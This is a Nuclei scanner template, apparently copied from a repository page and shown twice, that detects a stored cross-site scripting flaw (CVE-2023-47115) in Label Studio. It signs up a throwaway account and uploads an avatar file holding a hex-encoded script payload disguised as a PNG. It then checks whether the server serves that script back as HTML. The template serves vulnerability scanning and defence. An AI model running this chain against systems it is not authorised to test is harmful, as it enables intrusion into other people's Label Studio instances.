nuclei-templates/http/cves/2023/CVE-2023-47115.yaml

id: CVE-2023-47115

info:
  name: Stored Cross-Site Scripting Vulnerability in Label Studio
  author: isacaya
  severity: high
  description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.
  impact: |
    Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.
  remediation: |
    Update to version 1.9.2.
  reference:
    - https://nvd.nist.gov/vuln/detail/CVE-2023-47115
    - https://github.com/advisories/GHSA-q68h-xwq5-mm7x
  classification:
    cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L
    cvss-score: 7.1
    cve-id: CVE-2023-47115
    cwe-id: CWE-79
  tags: cve,cve2023,xss,authenticated

http:
  - raw:
      - |
        GET /user/login/ HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /user/signup/?&next=/projects/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: application/x-www-form-urlencoded

        csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false
      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}
      - |
        POST /api/users/{{id}}/avatar/ HTTP/1.1
        Host: {{Hostname}}
        Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF

        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
        Content-Disposition: form-data; name="avatar"; filename="nuclei.html"
        Content-Type: image/png

        {{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}
        ------WebKitFormBoundarytZZRQ9D2LS0PMsHF
      - |
        GET /api/current-user/whoami HTTP/1.1
        Host: {{Hostname}}
      - |
        GET {{filename}} HTTP/1.1
        Host: {{Hostname}}

    extractors:
      - type: xpath
        name: csrftoken
        internal: true
        attribute: value
        xpath:
          - '/html/body/div/form/input'
      - type: json
        part: body
        name: id
        internal: true
        json:
          - '.id'
      - type: json
        part: body
        name: filename
        internal: true
        json:
          - '.avatar'

    matchers-condition: and
    matchers:
      - type: dsl
        dsl:
          - "contains(header, 'text/html')"
          - "status_code == 200"
          - 'contains(body, "<script>alert(document.domain)</script>")'
        condition: and
Create CVE-2023-47115.yaml 2024-01-29 16:49:31 +00:00			`id: CVE-2023-47115`

			`info:`
			`name: Stored Cross-Site Scripting Vulnerability in Label Studio`
			`author: isacaya`
			`severity: high`
			`description: Versions prior to 1.9.2 have a cross-site scripting (XSS) vulnerability that could be exploited when an authenticated user uploads a crafted image file for their avatar that gets rendered as a HTML file on the website.`
			`impact: \|`
			`Executing arbitrary JavaScript could result in an attacker performing malicious actions on Label Studio users if they visit the crafted avatar image.`
			`remediation: \|`
			`Update to version 1.9.2.`
			`reference:`
			`- https://nvd.nist.gov/vuln/detail/CVE-2023-47115`
			`- https://github.com/advisories/GHSA-q68h-xwq5-mm7x`
			`classification:`
			`cvss-metrics: CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:L`
			`cvss-score: 7.1`
			`cve-id: CVE-2023-47115`
			`cwe-id: CWE-79`
			`tags: cve,cve2023,xss,authenticated`

			`http:`
			`- raw:`
			`- \|`
			`GET /user/login/ HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /user/signup/?&next=/projects/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: application/x-www-form-urlencoded`

			`csrfmiddlewaretoken={{csrftoken}}&email={{randstr_1}}%40{{randstr_1}}.{{randstr_1}}&password={{randstr_2}}&allow_newsletters=false`
			`- \|`
			`GET /api/current-user/whoami HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`POST /api/users/{{id}}/avatar/ HTTP/1.1`
			`Host: {{Hostname}}`
			`Content-Type: multipart/form-data; boundary=----WebKitFormBoundarytZZRQ9D2LS0PMsHF`

			`------WebKitFormBoundarytZZRQ9D2LS0PMsHF`
			`Content-Disposition: form-data; name="avatar"; filename="nuclei.html"`
			`Content-Type: image/png`

			`{{hex_decode("89504E470D0A1A0A0000000D4948445200000009000000080802000000A4AF42E200000046494441543C7363726970743E616C65727428646F63756D656E742E646F6D61696E293C2F7363726970743E")}}`
			`------WebKitFormBoundarytZZRQ9D2LS0PMsHF`
			`- \|`
			`GET /api/current-user/whoami HTTP/1.1`
			`Host: {{Hostname}}`
			`- \|`
			`GET {{filename}} HTTP/1.1`
			`Host: {{Hostname}}`

			`extractors:`
			`- type: xpath`
			`name: csrftoken`
			`internal: true`
			`attribute: value`
			`xpath:`
			`- '/html/body/div/form/input'`
			`- type: json`
			`part: body`
			`name: id`
			`internal: true`
			`json:`
			`- '.id'`
			`- type: json`
			`part: body`
			`name: filename`
			`internal: true`
			`json:`
			`- '.avatar'`

			`matchers-condition: and`
			`matchers:`
			`- type: dsl`
			`dsl:`
			`- "contains(header, 'text/html')"`
			`- "status_code == 200"`
			`- 'contains(body, "<script>alert(document.domain)</script>")'`
			`condition: and`